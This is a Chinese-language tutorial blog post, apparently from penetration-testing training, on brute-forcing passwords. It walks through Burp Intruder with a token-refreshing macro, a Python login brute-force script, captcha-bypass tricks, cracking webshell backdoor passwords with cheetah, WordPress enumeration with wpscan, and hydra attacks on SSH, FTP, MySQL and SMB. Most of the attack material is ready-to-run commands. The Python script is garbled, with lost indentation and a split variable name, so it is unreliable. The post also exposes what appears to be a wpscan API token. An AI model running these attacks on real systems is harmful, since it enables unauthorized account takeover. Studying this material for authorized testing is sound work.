{"id":779,"date":"2025-10-24T14:58:22","date_gmt":"2025-10-24T06:58:22","guid":{"rendered":"https:\/\/www.youvii.site\/?p=779"},"modified":"2025-10-24T15:00:57","modified_gmt":"2025-10-24T07:00:57","slug":"koulingqiongjubaopo","status":"publish","type":"post","link":"https:\/\/www.youvii.site\/index.php\/archives\/koulingqiongjubaopo","title":{"rendered":"\u53e3\u4ee4\u7a77\u4e3e\u7206\u7834"},"content":{"rendered":"

\u53e3\u4ee4\u7a77\u4e3e\u7206\u7834<\/h1>\n

\u7a77\u4e3e\u5c31\u662f\u679a\u4e3e\u7684\u610f\u601d\uff0c\u5728\u4e92\u8054\u7f51\u7684\u4eca\u5929\uff0c\u9700\u8981\u4f7f\u7528\u67d0\u79cd\u7684\u670d\u52a1\uff0c\u5927\u591a\u6570\u90fd\u9700\u8981\u53e3\u4ee4\u767b\u5f55\uff0c\u8fd9\u4e2a\u53e3\u4ee4\u5c31\u662f\u5bc6\u7801\uff0c\u5bc6\u7801\u7684\u5f3a\u5ea6\u5206\u4e3a\uff0c\u5f31\u53e3\u4ee4 \u3001\u4e2d\u5ea6\u53e3\u4ee4\u3001\u5f3a\u5ea6\u53e3\u4ee4\u3002<\/p>\n

\u5982\u679c\u767b\u5f55\u7684\u670d\u52a1\u4e3a\u5f31\u53e3\u4ee4\uff0c\u90a3\u4f1a\u5b58\u5728\u5f88\u5927\u7684\u5b89\u5168\u9690\u60a3\uff0c\u9ed1\u5ba2\u901a\u8fc7\u7a77\u4e3e\u5f31\u53e3\u4ee4\u5bf9\u670d\u52a1\u8fdb\u884c\u653b\u51fb\uff0c\u5f88\u5bb9\u6613\u5c31\u5f97\u5230\u767b\u5f55\u5bc6\u7801\u3002\u5f97\u5230\u5bc6\u7801\u4e4b\u540e\u5c31\u80fd\u767b\u5f55\u670d\u52a1\uff0c\u8fdb\u884c\u5176\u4ed6\u5371<\/p>\n

\u5bb3\u8f83\u5927\u5f97\u64cd\u4f5c\u3002\u9ed1\u5ba2\u4e5f\u80fd\u901a\u8fc7\u5bf9\u7528\u6237\u5f97\u4fe1\u606f\u6574\u7406\uff0c\u7ec4\u5408\u5bc6\u7801\u8fdb\u884c\u7a77\u4e3e\u653b\u51fb\u3002\u4f8b\u5982\u6839\u636e\u7528\u6237\u7684\u751f\u65e5\u53f7\u7801\uff0c\u51fa\u8eab\u5e74\u6708\u65e5\u548c\u59d3\u540d\u8fdb\u884c\u53e3\u4ee4\u7ec4\u5408\uff0c\u518d\u5bf9\u5176\u670d\u52a1\u8fdb\u884c\u7a77\u4e3e\u3002<\/p>\n

\u5e38\u89c1\u7684\u670d\u52a1<\/h1>\n

\"1745671360855-42c4f410-8134-4509-8dbf-544232caee13.png\"<\/p>\n

\"1745671371206-7b9f6eda-dcfb-477d-ae53-30b8d772615e.png\"<\/p>\n

\"1745671379157-c5588c6d-f33d-46ed-913b-a97112a812e4.png\"<\/p>\n

BP\u7a77\u4e3e\u540e\u53f0\u5bc6\u7801<\/h1>\n

\u622a\u53d6\u5305\u4e4b\u540e\u53d1\u9001\u5230 intruder \u5728\u5bc6\u7801\u8bbe\u7f6e\u53d8\u91cf<\/p>\n

\u9009\u62e9 payloads \u9009\u62e9\u8981\u7a77\u4e3e\u7684\u5b57\u5178<\/p>\n

\u8bbe\u7f6e\u653b\u51fb\u540e \u6839\u636e\u8fd4\u56de\u7684\u72b6\u6001\u7801 status \u6216\u8005 length \u7f51\u9875\u957f\u5ea6\u5bf9\u5176\u8fdb\u884c\u5224\u65ad\u3002\u8fd9<\/p>\n

\u91cc\u5f97\u5230\u6b63\u786e\u5f97\u5bc6\u7801\u662f 123456<\/p>\n

\u6839\u636e\u72b6\u6001\u7801 \u4e00\u822c\u6d4b\u8bd5\u6b63\u786e\u7684\u662f\u73b0\u5b9e 302 \u72b6\u6001\u7801 \u53e6\u5916\u5c31\u662f\u54cd\u5e94\u7f51\u9875\u7684\u957f\u5ea6<\/p>\n

BP\u5bf9webshell\u7a77\u4e3e\u7834\u89e3\u5bc6\u7801<\/h2>\n

\u7070\u5e3d\u5b50\u5bf9\u7f51\u7ad9\u653b\u7834\u540e\uff0c\u4e00\u822c\u4f1a\u7559\u540e\u95e8\u65b9\u4fbf\u5bf9\u5176\u7f51\u7ad9\u8fdb\u884c\u975e\u6cd5\u7ba1\u7406\u3002\u540e\u95e8\u7684\u7a0b\u5e8f\u8bed<\/p>\n

\u97f3\u5305\u62ec asp php .net \u8fd9\u4e9b\u811a\u672c\u6587\u4ef6\u653e\u5728\u7f51\u7ad9\u76ee\u5f55\uff0c \u4e00\u822c\u90fd\u91c7\u7528\u5355\u5bc6\u7801\u8fdb\u884c\u767b\u5f55\u3002<\/p>\n

\u901a\u8fc7\u626b\u63cf\u83b7\u53d6 webshell \u7684\u540e\u95e8\u7684\u7f51\u5740\u3002\u5f97\u5230\u7f51\u5740\u540e\u53ef\u4ee5\u5bf9\u5176\u8fdb\u884c\u5bc6\u7801\u7a77\u4e3e\u3002<\/p>\n

\u6709token\u9632\u5fa1\u7684\u7f51\u7ad9\u540e\u53f0\u7a77\u4e3e\u7834\u89e3\u5bc6\u7801<\/h2>\n

\u6709\u7684\u7f51\u7ad9\u540e\u53f0\u5b58\u5728 token \u503c\uff0c\u8fd9\u4e2a token \u901a\u4fd7\u7684\u540d\u5b57\u53eb\u4ee4\u724c\uff0c\u6bcf\u6b21\u5237\u65b0\u9875\u9762\u90fd\u4f1a<\/p>\n

\u968f\u673a\u53d8\u5316\u3002\u63d0\u4ea4\u8bf7\u6c42\u65f6\u5fc5\u987b\u643a\u5e26\u8fd9\u4e2a token \u503c\uff0c\u53ef\u4ee5\u5229\u7528\u8fd9\u70b9\u907f\u514d\u540e\u53f0\u8fdb\u884c\u76f4\u63a5<\/p>\n

\u7a77\u4e3e\u548c\u9632\u6b62 csrf \u653b\u51fb<\/p>\n

\"1745811439006-5d65fcc5-83bf-4f1b-9d78-0020591247f2.png\"<\/p>\n

BP\u8bbe\u7f6e\u5b8f\u83b7\u53d6token\u5bf9\u7f51\u7ad9\u540e\u53f0\u5bc6\u7801\u7834\u89e3<\/h2>\n

\u6253\u5f00 burpsuite \u5237\u65b0\u9875\u9762 \u63a5\u7740 forward \u653e\u884c\u8fd9\u4e2a\u6570\u636e\u5305<\/p>\n

\"1745811484043-a332d151-6667-42e9-87b2-de5d58caea4b.png\"<\/p>\n

\u6765\u5230 Project options –> Session– >add \u6dfb\u52a0\u5b8f<\/p>\n

\"1745811491619-c095e564-e453-489a-a972-a8f6902b09d2.png\"\"1745811528423-01e61dbf-f070-439a-9154-ee81cfe2e85b.png\"\"1745811533875-e96f6f04-e2b6-4b85-9a5a-8364b00d27ab.png\"\u9009\u62e9 Run a macro<\/p>\n

\"1745811544733-3b2136aa-2b80-4e9a-b8e7-733c544a2e57.png\"\u70b9\u51fb\u4e4b\u540e\u9009\u62e9\u7f51\u9875\u5386\u53f2\u9009\u62e9\u63d0\u4ea4\u4e4b\u540e\u6709 token \u7684\u9875\u9762\u3002<\/p>\n

\u6dfb\u52a0\u5b8f<\/p>\n

\"1745811556572-064872f8-1a9b-4504-b48f-78573341b6ab.png\"<\/p>\n

\"1745811611577-a2e18fac-7553-45a5-b5ee-a27492f71296.png\"<\/p>\n

\u8bbe\u7f6e configure item<\/p>\n

\"1745811620046-c762324c-31e6-4aaa-9559-50ab5a821916.png\"\"1745811625839-e9dd63c3-3934-4450-8fec-c033150aed76.png\"add \u6dfb\u52a0\u89c4\u5219<\/p>\n

\"1745811636643-e9ba283e-7018-453d-94bc-8851f40766cc.png\"<\/p>\n

\u9009\u62e9 value \u7684\u503c Parameter name \u586b\u5199 user_token \u8fd9\u4e2a\u503c\u4e00\u5b9a\u8981\u76f8\u540c<\/p>\n

\"1745811654938-c9e12e7e-f160-4eb5-8bd0-e5efd83011e1.png\"\"1745811661688-3f2b4731-30e8-47e2-a255-f6fd91d20587.png\"\"1745811667869-3d5666d1-2f72-4e05-be57-4b17dab783de.png\"\"1745811673748-1eba28b2-a9b6-43a8-8c3f-d3e6232666c1.png\"\"1745811679445-cef502ff-9c0b-4f4d-90b0-f1ba6bb6d534.png\"\"1745811685291-7a7dd288-9594-4b9f-8556-32fc9121dd77.png\"\"1745811698026-ade72113-9f8b-4adb-bcaa-b2b55b8703d0.png\"\"1745811706665-216647c8-8b2c-4836-98b3-b4cb7f877595.png\"\u8fd9\u6837\u5b8f\u5c31\u8bbe\u7f6e\u6210\u529f\u4e86\u3002<\/p>\n

\u63a5\u7740\u7a77\u4e3e\u6d4b\u8bd5 \u6293\u5305 \u8bbe\u7f6e\u53d8\u91cf \u6dfb\u52a0\u5bc6\u7801\u5b57\u5178<\/p>\n

\"1745811722342-2e013252-3329-48ef-beb7-d7e90461d9e6.png\"\"1745811728885-b81d260e-a731-4b61-8fc5-0053f80baaff.png\"\"1745811735740-24984a61-30fd-4c32-8b65-9d866617daad.png\"<\/p>\n

\"1745811747680-d284874b-f007-4111-bf37-f39adea54d5b.png\"<\/p>\n

\u5bc6\u7801\u662f password<\/p>\n

\u7f16\u5199\u811a\u672c\u83b7\u53d6token\u5bf9\u7f51\u7ad9\u540e\u53f0\u5bc6\u7801\u7834\u89e3<\/h2>\n

\u5c31\u4e0a\u9762\u7684\u767b\u5f55\u9875\u9762\u6765\u8bf4<\/p>\n

\u6bcf\u6b21\u8bbf\u95ee\u9875\u9762\u8fd9\u4e2a user_token \u90fd\u4f1a\u53d8\u5316\u5bfc\u81f4\u4e0d\u80fd\u91cd\u590d\u63d0\u4ea4\u3002<\/p>\n

\u9a8c\u8bc1\u539f\u7406\u6bcf\u6b21\u9875\u9762\u751f\u6210 user_token \u5b58\u5728 seesion \u91cc\u9762\u6bcf\u6b21\u767b\u5f55\u7528 session \u91cc\u53d6\u51fa\u6765<\/p>\n

\u7136\u540e\u9a8c\u8bc1\u5982\u679c\u9a8c\u8bc1\u6210\u529f \u5c31\u8fdb\u884c\u5bc6\u7801\u5339\u914d\u3002\u5982\u679c\u9a8c\u8bc1\u4e0d\u6210\u529f\u5c31\u8f93\u51fa csrf \u9519\u8bef\u3002<\/p>\n

\u811a\u672c\u6e90\u7801<\/p>\n

#coding:utf-8\nimport requests\nimport re\nurl = \"http:\/\/www.c3moon.com\/login.php\"\ndef login(password):\n    session = requests.session()\nreq=session.get(url)\nuser_token=re.search(\"[a-z0-9]{32}\",req.text).group(0) #32md5\ndata={\"username\":\"admin\",\"password\":password,\"Login\":\"Login\",'user_token':user_t\n      oken}\nreq=session.post(url=url,data=data,allow_redirects=True)\nhtml = req.text\nreturn html\nwith open('top1000.txt') as p:\n    passlist =p.readlines()\np.close()\nfor line in passlist:\n    line = line.strip(\"n\")\nprint(line)\nif 'File Upload' in login(line):\n    print( \"[* \u5bc6\u7801 is %s *]\" % line )\nbreak<\/code><\/pre>\n
\u5bc6\u7801\u7834\u89e3\u6210\u529f<\/p>\n
\"1745812261219-690af547-ebad-46ae-aad6-9d1f69400513.png\"<\/p>\n
\u9488\u5bf9\u6709\u9a8c\u8bc1\u7801\u540e\u53f0\u7684\u7a77\u4e3e\u65b9\u6cd5<\/h2>\n
\u7f51\u7ad9\u540e\u53f0\u6216\u8005\u6709\u767b\u5f55\u7684\u5730\u65b9\u90fd\u53ef\u80fd\u5b58\u5728\u9a8c\u8bc1\u7801\u9a8c\u8bc1\uff0c\u9a8c\u8bc1\u7801\u7684\u4f5c\u7528 \u4e0d\u5c11\u7f51\u7ad9\u4e3a\u4e86\u9632\u6b62\u7528\u6237\u5229\u7528\u673a\u5668\u4eba\u81ea\u52a8\u6ce8\u518c\u3001\u767b\u5f55\u3001\u704c\u6c34\uff0c\u90fd\u4f1a\u91c7\u7528\u9a8c\u8bc1\u7801\u6280\u672f\uff0c\u6240\u8c13\u7684\u9a8c\u8bc1\u7801\uff0c\u5c31\u662f\u5c06\u4e00\u4e32\u968f\u673a\u4ea7\u751f\u7684\u6570\u5b57\u548c\u7b26\u53f7\uff0c\u751f\u6210\u4e00\u5e45\u56fe\u7247\uff0c\u5728\u56fe\u50cf\u4e0a\u52a0\u4e0a\u5e72\u6270\u50cf\u7d20\uff08\u9632\u6b62 orc\uff09\uff0c\u8981\u7528\u6237\u7528\u8089\u773c\u8bc6\u522b\u5176\u4e2d\u7684\u9a8c\u8bc1\u7801\u4fe1\u606f\uff0c\u8f93\u5165\u8868\u5355\u63d0\u4ea4\u7f51\u7ad9\u9a8c\u8bc1\u3002\u9a8c\u8bc1\u540e\u4f7f\u7528\u7f51\u7ad9\u67d0\u4e2a\u529f\u80fd.\u4f46\u662f\u5982\u679c\u9a8c\u8bc1\u7801\u903b\u8f91\u7f16\u5199\u4e0d\u597d\u4f1a\u5b58\u5728\u88ab\u7ed5\u8fc7\u7684\u98ce\u9669\u3002<\/p>\n
cookie\u4e0d\u5b58\u5728\u4e0d\u9a8c\u8bc1\u7ed5\u8fc7<\/h2>\n
\u6709\u4e9b\u7f51\u7ad9\u5982\u679c\u7f51\u7ad9\u4e0d\u5b58\u5728 cookie \u5c31\u4e0d\u4f1a\u9a8c\u8bc1 \u9a8c\u8bc1\u7801<\/p>\n
\"1745812526072-ab385905-504e-464b-9866-e5bc6c2275e8.png\"\u5220\u9664 PHPSESSION \u4fe1\u606f \u9a8c\u8bc1\u7801\u5c31\u4e0d\u8fdb\u884c\u9a8c\u8bc1\u4e86<\/p>\n
\"1745812536376-fc154239-b5f4-492d-b274-94408fa31858.png\"<\/p>\n
\u63a5\u7740\u5bf9\u5bc6\u7801\u8fdb\u884c\u7a77\u4e3e<\/p>\n
\"1745812545915-2d85984e-6d0c-49a5-9d03-5c4c1a745507.png\"\u7834\u89e3\u5bc6\u7801\u6210\u529f\uff0c\u767b\u5f55\u540e\u53f0\u3002<\/p>\n
\u540e\u53f0\u767b\u5f55\u9a8c\u8bc1\u7801\u6ca1\u9500\u6bc1\u8fdb\u884c\u7a77\u4e3e<\/h2>\n
\u5728\u767b\u5f55\u63d0\u4ea4\u7684\u65f6\u5019\u8fdb\u884c\u9a8c\u8bc1\u7801\u9a8c\u8bc1 \u4e0d\u7ba1\u5bc6\u7801\u662f\u5426\u6b63\u786e\uff0c\u90fd\u8981\u9500\u6bc1\u9a8c\u8bc1\u7801\u3002<\/p>\n
\u4e0d\u7136\u9a8c\u8bc1\u7801\u53ef\u590d\u7528\u786e\u5b9a\u7684\u9a8c\u8bc1\u7801<\/p>\n
\"1745812581151-536f9470-d534-4153-966e-b035b631c9a6.png\"\"1745812588451-ef430071-58ef-4204-9bcb-8cfef2b261ca.png\"\u9519\u8bef\u7684\u9a8c\u8bc1\u7801\"1745812621277-a8755454-0602-47ff-9e35-44e76381ad6f.png\"<\/p>\n
\u7f51\u7ad9\u540e\u53f0\u9a8c\u8bc1\u7801\u8bc6\u522b\u7a77\u4e3e\u9a8c\u8bc1\u7801<\/h2>\n
\u9a8c\u8bc1\u7801\u5e72\u6270\u50cf\u7d20\u592a\u5c11\u5f88\u5bb9\u6613\u5c31\u4f1a\u88ab\u4e00\u4e9b\u5de5\u5177\u8bc6\u522b\u51fa\u6765\u3002\u5982\u56fe\u7247\u63d0\u53d6\u6587\u5b57\u5de5\u5177<\/p>\n
\"1745812646341-74e85e30-092b-47ff-995a-de1e97575497.png\"\u767b\u5f55\u6846\u5b58\u5728\u9a8c\u8bc1\u7801 \u8fd9\u4e2a\u9a8c\u8bc1\u7801\u53ef\u88ab\u8bc6\u522b\u7684\u60c5\u51b5\u4e0b \u5c31\u4f1a\u88ab\u7a77\u4e3e\u5bc6\u7801\"1745812659863-6687d6b5-79fc-48e2-8873-8b7f451175e1.png\"\u5c06 burpsuite \u7684\u5305\u653e\u8fdb\u9a8c\u8bc1\u7801\u8bc6\u522b\u5de5\u5177 \u8bbe\u7f6e\u5b57\u5178\u548c\u9a8c\u8bc1\u7801\u53c2\u6570<\/p>\n
\"1745812676386-196c8874-8b98-4685-8e86-35c9b391ada1.png\"\u63a5\u7740\u9009\u62e9\u7206\u7834\u680f \u9009\u62e9\u9519\u8bef\u7684\u9a8c\u8bc1\u7801\u5173\u952e\u8bcd \u8bbe\u7f6e\u7ebf\u7a0b \u70b9\u51fb start \u5373\u53ef \u53ef\u4ee5\u9009\u62e9<\/p>\n
\u518d\u6b21\u7206\u7834 \u9a8c\u8bc1\u51c6\u786e\u7387\u4f1a\u63d0\u9ad8\u3002<\/p>\n
\"1745812692771-26189010-3d5d-495c-b46d-0f58a5c5e2c8.png\"\u6700\u540e\u67e5\u770b\u54cd\u5e94\u957f\u5ea6 \u83b7\u53d6\u6b63\u786e\u7684\u5bc6\u7801\u3002<\/p>\n
phpmyadmin\u5bc6\u7801\u7a77\u4e3e<\/h1>\n
phpmyadmin \u662f mysql \u7684\u4e00\u4e2a web \u7ba1\u7406\u5de5\u5177\uff0c\u53ef\u4ee5\u901a\u8fc7\u8fd9\u4e2a\u5de5\u5177\u7a77\u4e3e mysql \u7528\u6237\u7684\u8d26\u53f7\u548c\u5bc6\u7801<\/p>\n
\"1745812725566-c5148e4c-9809-4674-b051-21520312473a.png\"<\/p>\n
\u4e00\u53e5\u8bdd\u6728\u9a6c\u540e\u95e8\u7834\u89e3<\/h1>\n
\u4e00\u53e5\u8bdd\u540e\u95e8\u53ef\u4ee5\u4f7f\u7528 burpsuite \u901a\u7528\u7a77\u4e3e\u65b9\u6cd5\u7a77\u4e3e\u5bc6\u7801<\/p>\n
\"1745812755091-fcecb5dd-3476-4d41-a6d1-fdc56a81da4e.png\"\u6293\u5305 \u5c06 cmd \u8bbe\u7f6e\u6210\u53d8\u91cf \u6dfb\u52a0\u5b57\u5178\u5373\u53ef<\/p>\n
\"1745812767041-3075b1d8-5b67-424f-bbe8-74ebc1277383.png\"<\/p>\n
\"1745812805024-51493f8c-9e1d-4e8d-b8ac-a00721cd84ed.png\"\u5173\u952e\u5b57<\/p>\n
asp\nqweasd123=execute(\"response.clear:response.write(\"\"passwordright\"\"):response.end\")<\/code><\/pre>\n
php\necho \"password right\";<\/code><\/pre>\n
aspx\nqweasd123=Response.Write(\"moonsec\");<\/code><\/pre>\n
\u5bc6\u7801\u662f qweasd123<\/p>\n
cheetah\u5bf9\u4e00\u53e5\u540e\u95e8\u5bc6\u7801\u7a77\u4e3e<\/h1>\n
cheetah \u662f\u9488\u5bf9\u4e00\u53e5\u8bdd\u540e\u95e8\u7684\u7a77\u4e3e\u5de5\u5177<\/p>\n
python cheetah.py -u http:\/\/orz\/orz.php<\/a><\/p>\n
python cheetah.py -u http:\/\/orz\/orz.jsp<\/a> -r post -n 1000 -v<\/p>\n
python cheetah.py -u http:\/\/orz\/orz.asp<\/a> -r get -c -p data\/pwd.list<\/p>\n
python cheetah.py -u http:\/\/orz\/orz<\/a> -w aspx -s iis -n 1000<\/p>\n
python cheetah.py -b url.list -c -p pwd1.list pwd2.list -v<\/p>\n
cheetah.py -u http:\/\/www.c1moon.com\/a.php<\/a> -n 1000 -v -p data\/pwd.list<\/p>\n
cheetah.py -u http:\/\/www.c1moon.com\/a.asp<\/a> -n 1000 -v -p data\/pwd.list<\/p>\n
cheetah.py -u http:\/\/www.c1moon.com\/a.aspx<\/a> -n 1000 -v -p data\/pwd.list<\/p>\n
\u652f\u6301 asp php .net jsp \u540e\u95e8<\/p>\n
-u \u540e\u95e8\u5730\u5740<\/p>\n
-r \u63d0\u4ea4\u7684\u65b9\u6cd5 \u4e00\u822c\u662f post<\/p>\n
-n \u4e00\u6b21\u63d0\u4ea4\u5bc6\u7801\u7684\u6570\u91cf<\/p>\n
-v \u8be6\u7ec6\u4fe1\u606f<\/p>\n
-p \u5b57\u5178\u4f4d\u7f6e<\/p>\n
\u4f8b\u5b50<\/p>\n
python cheetah.py -u http:\/\/www.c1moon.com\/cmd.php<\/a> -r post -n 1000 -v<\/p>\n
\"1745812895741-99258cde-fdfe-4ac1-88ce-4beea33eb741.png\"<\/p>\n
wordpress\u535a\u5ba2\u6d17\u5934\u7528\u6237\u5bc6\u7801\u7a77\u4e3e<\/h1>\n
wordpress \u662f\u77e5\u540d\u7684\u535a\u5ba2\u7cfb\u7edf\uff0c\u5728\u4e92\u8054\u7f51\u4e0a\u7684\u5360\u6709\u91cf\u5f88\u5927\uff0c\u6240\u4ee5\u4e00\u5b9a\u8981\u77e5\u9053\u8fd9\u5957<\/p>\n
\u7cfb\u7edf\u7684\u5f31\u53e3\u4ee4\u7a77\u4e3e\u7684\u65b9\u6cd5<\/p>\n
https:\/\/wpscan.com<\/a> \u9996\u5148\u5230\u8fd9\u4e2a\u7f51\u7ad9\u6ce8\u518c\u8d26\u53f7\u548c\u5bc6\u7801\u6ce8\u518c\u540e\u83b7\u53d6 token<\/p>\n
\"1745812948581-6268e2cf-1414-40bd-a410-dc22a56d70ff.png\"<\/p>\n
\u81ea\u52a8\u627e\u8d26\u53f7\u4fe1\u606f \u7136\u540e\u767b\u5f55\u7a77\u4e3e<\/p>\n
wpscan –url http:\/\/www.redteam.com\/<\/a> -e u -P \/home\/kali\/top100password.txt<\/p>\n
–api-token QYbHH6fbNDIi6Op3MQuvg85fD4fhNiB4RKJsVOMVp6w<\/p>\n
\"1745812968338-7c346efa-6180-44cf-aa7c-aacbabb01ce0.png\"\u624b\u52a8\u6536\u96c6 wordpress \u7528\u6237\u4fe1\u606f \u8bbf\u95ee\u8fde\u63a5\u83b7\u53d6\u7528\u6237\u4fe1\u606f<\/p>\n
http:\/\/www.vtmoon1.com\/wp-json\/wp\/v2\/users<\/a><\/p>\n
\u83b7\u53d6\u4fe1\u606f\u53ef\u4ee5\u518d\u8fdb\u884c\u6307\u5b9a\u7528\u6237\u7206\u7834\"1745812982743-e5cdcbe2-95ef-433f-a3f3-acf5a1512d85.png\"<\/p>\n
wpscan –url http:\/\/www.vtmoon1.com<\/a> -U moonsec -P \/home\/kali\/top1000.txt<\/p>\n
\"1745812998054-04af6801-aad4-4139-9dc9-c4d231e91ef8.png\"<\/p>\n
\u5e38\u89c1\u7aef\u53e3\u670d\u52a1\u7a77\u4e3e<\/h1>\n
hydra\u5bc6\u7801\u7a77\u4e3e\u5de5\u5177<\/h2>\n
hydra \u662f\u4e00\u4e2a\u7aef\u53e3\u7a77\u4e3e\u670d\u52a1\u5668\u7684\u5de5\u5177<\/p>\n
adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post}http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listeneroracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcaprsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp<\/p>\n
\u4f7f\u7528\u4f8b\u5b50<\/p>\n
hydra -l user -P passlist.txt ftp:\/\/192.168.0.1<\/p>\n
hydra -L userlist.txt -p defaultpw imap:\/\/192.168.0.1\/PLAIN<\/p>\n
hydra -C defaults.txt -6 pop3s:\/\/[2001:db8::1]:143\/TLS:DIGEST-MD5<\/p>\n
hydra -l admin -p password ftp:\/\/[192.168.0.0\/24]\/<\/p>\n
hydra -L logins.txt -P pws.txt -M targets.txt ssh<\/p>\n
\u5e38\u7528\u53c2\u6570\u8bf4\u660e<\/p>\n
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]<\/p>\n
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]<\/p>\n
server service [OPT]<\/p>\n
-R<\/p>\n
\u7ee7\u7eed\u4ece\u4e0a\u4e00\u6b21\u8fdb\u5ea6\u63a5\u7740\u7834\u89e3<\/p>\n
-S<\/p>\n
\u5927\u5199\uff0c\u91c7\u7528 SSL \u94fe\u63a5<\/p>\n
-s <\/p>\n
\u5c0f\u5199\uff0c\u53ef\u901a\u8fc7\u8fd9\u4e2a\u53c2\u6570\u6307\u5b9a\u975e\u9ed8\u8ba4\u7aef\u53e3<\/p>\n
-l <\/p>\n
\u6307\u5b9a\u7834\u89e3\u7684\u7528\u6237\uff0c\u5bf9\u7279\u5b9a\u7528\u6237\u7834\u89e3<\/p>\n
-L <\/p>\n
\u6307\u5b9a\u7528\u6237\u540d\u5b57\u5178<\/p>\n
-p <\/p>\n
\u5c0f\u5199\uff0c\u6307\u5b9a\u5bc6\u7801\u7834\u89e3\uff0c\u5c11\u7528\uff0c\u4e00\u822c\u662f\u91c7\u7528\u5bc6\u7801\u5b57\u5178<\/p>\n
-P <\/p>\n
\u5927\u5199\uff0c\u6307\u5b9a\u5bc6\u7801\u5b57\u5178<\/p>\n
-e <\/p>\n
\u53ef\u9009\u9009\u9879\uff0cn\uff1a\u7a7a\u5bc6\u7801\u8bd5\u63a2\uff0cs\uff1a\u4f7f\u7528\u6307\u5b9a\u7528\u6237\u548c\u5bc6\u7801\u8bd5\u63a2<\/p>\n
-C <\/p>\n
\u4f7f\u7528\u5192\u53f7\u5206\u5272\u683c\u5f0f\uff0c\u4f8b\u5982\u201c\u767b\u5f55\u540d:\u5bc6\u7801\u201d\u6765\u4ee3\u66ff-L\/-P \u53c2\u6570<\/p>\n
-M <\/p>\n
\u6307\u5b9a\u76ee\u6807\u5217\u8868\u6587\u4ef6\u4e00\u884c\u4e00\u6761<\/p>\n
-o <\/p>\n
\u6307\u5b9a\u7ed3\u679c\u8f93\u51fa\u6587\u4ef6<\/p>\n
-f<\/p>\n
\u5728\u4f7f\u7528-M \u53c2\u6570\u4ee5\u540e\uff0c\u627e\u5230\u7b2c\u4e00\u5bf9\u767b\u5f55\u540d\u6216\u8005\u5bc6\u7801\u7684\u65f6\u5019\u4e2d\u6b62\u7834\u89e3<\/p>\n
-t <\/p>\n
\u540c\u65f6\u8fd0\u884c\u7684\u7ebf\u7a0b\u6570\uff0c\u9ed8\u8ba4\u4e3a 16<\/p>\n
-w 
\u8bbe\u7f6e\u6700\u5927\u8d85\u65f6\u7684\u65f6\u95f4\uff0c\u5355\u4f4d\u79d2\uff0c\u9ed8\u8ba4\u662f 30s<\/p>\n
-v \/ -V<\/p>\n
\u663e\u793a\u8be6\u7ec6\u8fc7\u7a0b<\/p>\n
server<\/p>\n
\u76ee\u6807 ip<\/p>\n
service<\/p>\n
\u6307\u5b9a\u670d\u52a1\u540d\uff0c\u652f\u6301\u7684\u670d\u52a1\u548c\u534f\u8bae\uff1atelnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp<\/p>\n
\u7b49\u7b49<\/p>\n
OPT<\/p>\n
\u53ef\u9009\u9879<\/p>\n
\u4f7f\u7528hydra\u7a77\u4e3essh\u670d\u52a1<\/h2>\n
-L \u7528\u6237\u5b57\u5178\u6587\u4ef6 -P \u5bc6\u7801\u5b57\u5178\u6587\u4ef6 -t \u7ebf\u7a0b\u6570 -vV \u8be6\u7ec6\u4fe1\u606f -e ns \u4f7f\u7528\u7a7a\u53e3\u4ee4<\/p>\n
\u4f7f\u7528\u6307\u5b9a\u7528\u6237\u548c\u5bc6\u7801\u8bd5\u63a2 192.168.1.104 \u4f60\u8981\u7a77\u4e3e\u7684 ip ssh \u662f\u670d\u52a1 -o \u4fdd\u5b58\u6587\u4ef6<\/p>\n
-f \u5982\u679c\u627e\u5230\u9a6c\u4e0a\u4e2d\u65ad\u626b\u63cf<\/p>\n
hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh -o ssh.txt -f<\/p>\n
ssh:\/\/192.168.1.104<\/p>\n
192.168.1.104 ssh<\/p>\n
-l \u6307\u5b9a\u7528\u6237<\/p>\n
hydra -l root -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh -o ssh.txt -f<\/p>\n
hydra -l root -P 2019_top100.txt 192.168.52.13 ssh -vV -f<\/p>\n
\"1745813140313-ed10a690-a6be-4739-8394-7f6d229a9b55.png\"<\/p>\n
\u4f7f\u7528hydra\u7a77\u4e3eftp\u670d\u52a1<\/h2>\n
hydra ip ftp -l \u7528\u6237\u540d -P \u5bc6\u7801\u5b57\u5178 -t \u7ebf\u7a0b(\u9ed8\u8ba4 16) -vV<\/p>\n
hydra ip ftp -l \u7528\u6237\u540d -P \u5bc6\u7801\u5b57\u5178 -e ns -vV<\/p>\n
hydra -l c5moon -P 2019_top100.txt 192.168.52.6 ftp -vV -f<\/p>\n
\"1745813163304-fd151074-2b4b-4ae9-a0f6-29d703005b7f.png\"<\/p>\n
\u4f7f\u7528hydra\u7a77\u4e3emysql\u670d\u52a1<\/h2>\n
hydra ip mysql -l \u7528\u6237\u540d -P \u5bc6\u7801\u5b57\u5178 -t \u7ebf\u7a0b(\u9ed8\u8ba4 16) -vV<\/p>\n
hydra ip mysql -l \u7528\u6237\u540d -P \u5bc6\u7801\u5b57\u5178 -e ns -vV<\/p>\n
hydra ip mysql -l \u7528\u6237\u540d -P \u5bc6\u7801\u5b57\u5178 -e ns -vV -s \u7aef\u53e3<\/p>\n
\u4f7f\u7528hydra\u7a77\u4e3esmb\u670d\u52a1<\/h2>\n
hydra -l administrator -P 2019_top100.txt 192.168.52.6 smb -vV -f<\/p>\n
\"1745813202781-3732d4b0-44ae-4b1c-878c-5d7e97beb0d1.png\"<\/p>\n
\"1745813211709-c8a9c7ee-808d-4a26-9f1c-a22cc74e85ad.png\"<\/p>\n
